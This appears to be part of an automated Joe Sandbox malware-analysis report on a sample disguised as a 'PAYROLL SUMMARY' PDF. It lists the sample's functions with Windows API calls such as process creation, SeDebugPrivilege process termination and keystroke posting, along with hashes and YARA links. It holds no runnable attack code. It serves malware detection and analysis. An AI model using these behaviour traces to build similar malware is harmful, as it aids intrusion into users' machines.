Opcode ID: 5a9a7d83d40269d57692c3d75716a66c2bced3e30a20157d5213ef1e6f2582c9
Instruction ID: 798b5e861839e959aa470d1f865a71487ad9bab56dbf90dad50642247edb3c90
Opcode Fuzzy Hash: 5a9a7d83d40269d57692c3d75716a66c2bced3e30a20157d5213ef1e6f2582c9
Instruction Fuzzy Hash: 8691C171A20215AFDF24DFA5D848FAEB7B8EF45710F10825DF509AB280D7709995CFA0

Function 002AA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,002AAA64), ref: 002AA9A2

Strings

INSTANCE, xrefs: 002AA8B0
TEXT, xrefs: 002AA8D9
CLASS, xrefs: 002AA721
REGEXPCLASS, xrefs: 002AA767
CLASSNN, xrefs: 002AA744
NAME, xrefs: 002AA7D4

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 5503ad19a84047d7c1cf05850c42564c576bef10ccc851bf9004ca54a14b6f9a
Instruction ID: 4b32a42455300b33a21664b1baf700e7e26b95617ea1ba62f1347c8ea132417c
Opcode Fuzzy Hash: 5503ad19a84047d7c1cf05850c42564c576bef10ccc851bf9004ca54a14b6f9a
Instruction Fuzzy Hash: C9917230A20607EBDB58DF60C491BEEFB75BF05314F10811AD89AA7191DF306A69DF91

Function 00252E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00252EAE

Part of subcall function 00251DB3: GetClientRect.USER32(?,?), ref: 00251DDC
Part of subcall function 00251DB3: GetWindowRect.USER32(?,?), ref: 00251E1D
Part of subcall function 00251DB3: ScreenToClient.USER32(?,?), ref: 00251E45

GetDC.USER32 ref: 0028CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0028CF95
SelectObject.GDI32(00000000,00000000), ref: 0028CFA3
SelectObject.GDI32(00000000,00000000), ref: 0028CFB8
ReleaseDC.USER32(?,00000000), ref: 0028CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0028D04B

Strings

U, xrefs: 0028CF20

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 4e068ca2aa077f246fe691bb75d028807e3d99e878f87356d53979cef9afd8c9
Instruction ID: 0428de61e2f1d20dbacc984c7cfb55fbe022897f4491835a3f623b7bb63bdbab
Opcode Fuzzy Hash: 4e068ca2aa077f246fe691bb75d028807e3d99e878f87356d53979cef9afd8c9
Instruction Fuzzy Hash: C3712534421206DFCF219F64C885AFA3BB5FF09311F24826AEE555A2E6C7319C69DF60

Function 002C8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,002DF910), ref: 002C903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002DF910), ref: 002C9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 002C91EB
SysFreeString.OLEAUT32(?), ref: 002C9215

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 9087aa67415b4af7bec004fe1952240a031a7a4e49ea44714f5c09287c3aa199
Instruction ID: 46fc82cd81ac1ff39df3fdb15f208ba24254e1209730bbedc067bf5ff91fb082
Opcode Fuzzy Hash: 9087aa67415b4af7bec004fe1952240a031a7a4e49ea44714f5c09287c3aa199
Instruction Fuzzy Hash: 93F13A71A1010AEFDB04DF94C888FAEB7B9FF49314F148199F916AB250CB71AE95CB50

Function 002CF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002CF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002CFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002CFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 002CFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002CFD90
CloseHandle.KERNEL32(?), ref: 002CFDBF
CloseHandle.KERNEL32(?), ref: 002CFE36

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a3a4b625af645cd2063ed79d024047654f9fa60a3b4e2b71806ec3328b627454
Instruction ID: 5e3d3ea1da95bfcac1a020cb5c73a3ebbb5598f75e2dd3f302dd55e441b255d1
Opcode Fuzzy Hash: a3a4b625af645cd2063ed79d024047654f9fa60a3b4e2b71806ec3328b627454
Instruction Fuzzy Hash: 9EE1B131224241DFCB54EF24C591F6ABBE1AF85354F14856DF89A8B2A2CB31EC64CF52

Function 002B4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 002B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B38D3,?), ref: 002B48C7

Part of subcall function 002B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B38D3,?), ref: 002B48E0

Part of subcall function 002B4CD3: GetFileAttributesW.KERNEL32(?,002B3947), ref: 002B4CD4

lstrcmpiW.KERNEL32(?,?), ref: 002B4FE2
_wcscmp.LIBCMT ref: 002B4FFC
MoveFileW.KERNEL32(?,?), ref: 002B5017

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 1f5d2b4c4c6927e6c4bbacbef5e3be2e7391e21210cfc41eb8ece50a6c3ee8ef
Instruction ID: afcfbcd7f5b32b8046214f990f67052a9206baf92a196f469a820866fdfaa533
Opcode Fuzzy Hash: 1f5d2b4c4c6927e6c4bbacbef5e3be2e7391e21210cfc41eb8ece50a6c3ee8ef
Instruction Fuzzy Hash: D55196B24183859BC724EF64D881ADFB3ECAF84341F00492EF589D7152EF70A59C8B66

Function 002D88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 002D896E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: f66a661372a15ae2f63350d0a7b22e77945fba00a0298d7e8ce2b8d8f6d46da8
Instruction ID: b44d03297507ef648bff2aca13d75c96fd6fcf32f2c697d0dfd30f36378404e9
Opcode Fuzzy Hash: f66a661372a15ae2f63350d0a7b22e77945fba00a0298d7e8ce2b8d8f6d46da8
Instruction Fuzzy Hash: 4D51A230620209BFEB209F28DC89BA97B65FF05310F604117F915E67E1DFB1ADA49B81

Function 00252B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0028C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0028C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0028C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0028C5C0
DestroyIcon.USER32(00000000), ref: 0028C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0028C5EC
DestroyIcon.USER32(?), ref: 0028C5FB

Part of subcall function 002DA71E: DeleteObject.GDI32(00000000), ref: 002DA757

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 96f13bcdc073e3a6c7e9dfcb202590afbbd11dd89deff1f76ffaf6db37407b2f
Instruction ID: 435578f4e7cc295d4d88f08a1677e061021855964b8751353c8b18eb48ed2e9f
Opcode Fuzzy Hash: 96f13bcdc073e3a6c7e9dfcb202590afbbd11dd89deff1f76ffaf6db37407b2f
Instruction Fuzzy Hash: 89519C74A21205EFDB20DF24DC45FAA77B9EB49311F104529F902A72D0D770EDA4DB64

Function 002A9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 002AAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 002AAE77
Part of subcall function 002AAE57: GetCurrentThreadId.KERNEL32 ref: 002AAE7E
Part of subcall function 002AAE57: AttachThreadInput.USER32(00000000,?,002A9B65,?,00000001), ref: 002AAE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 002A9B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002A9B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 002A9B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 002A9B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 002A9BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A9BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 002A9BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 002A9BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 002A9BDD

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f9c4056bcd67a125dae8dc77985e7fd38076f54a9ef968f73f30784ee722518b
Instruction ID: c4f5217bf797cb8eda3c0cbd897a131080d5a68df77c0b304697feb9c86ef274
Opcode Fuzzy Hash: f9c4056bcd67a125dae8dc77985e7fd38076f54a9ef968f73f30784ee722518b
Instruction Fuzzy Hash: 4811C271950218BFF6106F60EC4DF6A3B1DDB4D755F100426F659AB0A0CAF29C60DAA8

Function 002A8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,002A8A84,00000B00,?,?), ref: 002A8E0C
HeapAlloc.KERNEL32(00000000,?,002A8A84,00000B00,?,?), ref: 002A8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,002A8A84,00000B00,?,?), ref: 002A8E28
GetCurrentProcess.KERNEL32(?,00000000,?,002A8A84,00000B00,?,?), ref: 002A8E30
DuplicateHandle.KERNEL32(00000000,?,002A8A84,00000B00,?,?), ref: 002A8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,002A8A84,00000B00,?,?), ref: 002A8E43
GetCurrentProcess.KERNEL32(002A8A84,00000000,?,002A8A84,00000B00,?,?), ref: 002A8E4B
DuplicateHandle.KERNEL32(00000000,?,002A8A84,00000B00,?,?), ref: 002A8E4E
CreateThread.KERNEL32(00000000,00000000,002A8E74,00000000,00000000,00000000), ref: 002A8E68

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: eeacc33af349bd5cb5123532800ba1ecb8a59bdce470b06e3250df380411573a
Instruction ID: efb55a5da28d01dbe68725038553452ce280791dbb61dbce2a7e8b3de9c8e7ba
Opcode Fuzzy Hash: eeacc33af349bd5cb5123532800ba1ecb8a59bdce470b06e3250df380411573a
Instruction Fuzzy Hash: 5901A8B5641348FFE650ABA5ED4DF6B3BACEB89711F004421FA09DB1A1CA70DC008A24

Function 002C9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 002A7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?,?,002A799D), ref: 002A766F
Part of subcall function 002A7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?), ref: 002A768A
Part of subcall function 002A7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?,?), ref: 002A7698
Part of subcall function 002A7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A758C,80070057,?), ref: 002A76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002C9B1B
_memset.LIBCMT ref: 002C9B28
_memset.LIBCMT ref: 002C9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 002C9C97
CoTaskMemFree.OLE32(?), ref: 002C9CA2

Strings

NULL Pointer assignment, xrefs: 002C9CF0

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 424e5c748a784204a043c551aa3abf7dd3fae3cf7d3791f9e23ab4fed5614871
Instruction ID: 5b0dc707c65c9bbef5a70958ca74ff5dc295d15ff38272845c0c58d852c6d5b6
Opcode Fuzzy Hash: 424e5c748a784204a043c551aa3abf7dd3fae3cf7d3791f9e23ab4fed5614871
Instruction Fuzzy Hash: C3913971D10229EBDB10DFA4DC84EDEBBB9BF08710F20415AF51AA7281DB719A54CFA0

Function 002D6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 002D70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D70C1
_wcscat.LIBCMT ref: 002D711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 002D7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D7161

Strings

SysListView32, xrefs: 002D7065

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: de923962f1407e3ed9589bfd57b60dbd6cb56b2bc100e3f8fcc609cece18a9e2
Instruction ID: 20397cfd25cd7e29150aa70b3b565737578b7155f034db513ccf45d33f2d255f
Opcode Fuzzy Hash: de923962f1407e3ed9589bfd57b60dbd6cb56b2bc100e3f8fcc609cece18a9e2
Instruction Fuzzy Hash: 8D41C270914309AFDB219FA4CC85BEE77A8EF08350F10452BF549E72D1E7759D948B50

Function 002CEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 002B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 002B3EB6
Part of subcall function 002B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 002B3EC4
Part of subcall function 002B3E91: CloseHandle.KERNEL32(00000000), ref: 002B3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CECB8
GetLastError.KERNEL32 ref: 002CECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 002CED77
GetLastError.KERNEL32(00000000), ref: 002CED82
CloseHandle.KERNEL32(00000000), ref: 002CEDB7

Strings

SeDebugPrivilege, xrefs: 002CECD6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 646f6682d20b3fd97b80300af0d9140bcf9c9713a48d1485c85630312f4dd4ad
Instruction ID: a411ee201f9a2eb3002d2b28cc63b35c984b27076e154cf4500eb31150a6f5ed
Opcode Fuzzy Hash: 646f6682d20b3fd97b80300af0d9140bcf9c9713a48d1485c85630312f4dd4ad
Instruction Fuzzy Hash: C341BB302202019FCB14EF24C899F6EB7A4AF40710F19805DF8439B2C2CBB5A964CF96

Function 002B3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002B32C5

Strings

info, xrefs: 002B3266
blank, xrefs: 002B3247
warning, xrefs: 002B32AE
stop, xrefs: 002B3296
question, xrefs: 002B327E

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f7b9e57fcebd06fc2a1e20b65e6ce11cac874430537255718bf61974a5dd551f
Instruction ID: e03672de4c35841d8d34c1ffbf7ea2d8ca4b8ed26b53594c22ee7f4e74fe1011
Opcode Fuzzy Hash: f7b9e57fcebd06fc2a1e20b65e6ce11cac874430537255718bf61974a5dd551f
Instruction Fuzzy Hash: CB115732269357BAEB01DE54EC52DEAB3DCDF193B0F20402AFD04A61C1E6B15F200AA5

Function 002B4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B454E
LoadStringW.USER32(00000000), ref: 002B4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002B456B
LoadStringW.USER32(00000000), ref: 002B4572
_wprintf.LIBCMT ref: 002B4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 002B4593

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 576575313dfd6d084e284daca6103795ca6833b94850eef3b9cdbb629a661677
Instruction ID: d5dfa3fb7a3dfcd179d53213f33077782e178917b9b51310ae32ea10a969032e
Opcode Fuzzy Hash: 576575313dfd6d084e284daca6103795ca6833b94850eef3b9cdbb629a661677
Instruction Fuzzy Hash: C901A7F2801208BFE751EB94DE8DEE7736CD708300F4044A6B70AD2051E6709E848B74

Function 002DD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

GetSystemMetrics.USER32(0000000F), ref: 002DD78A
GetSystemMetrics.USER32(0000000F), ref: 002DD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DDA24
ShowWindow.USER32(00000003,00000000), ref: 002DDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 002DDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 002DDA8B

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

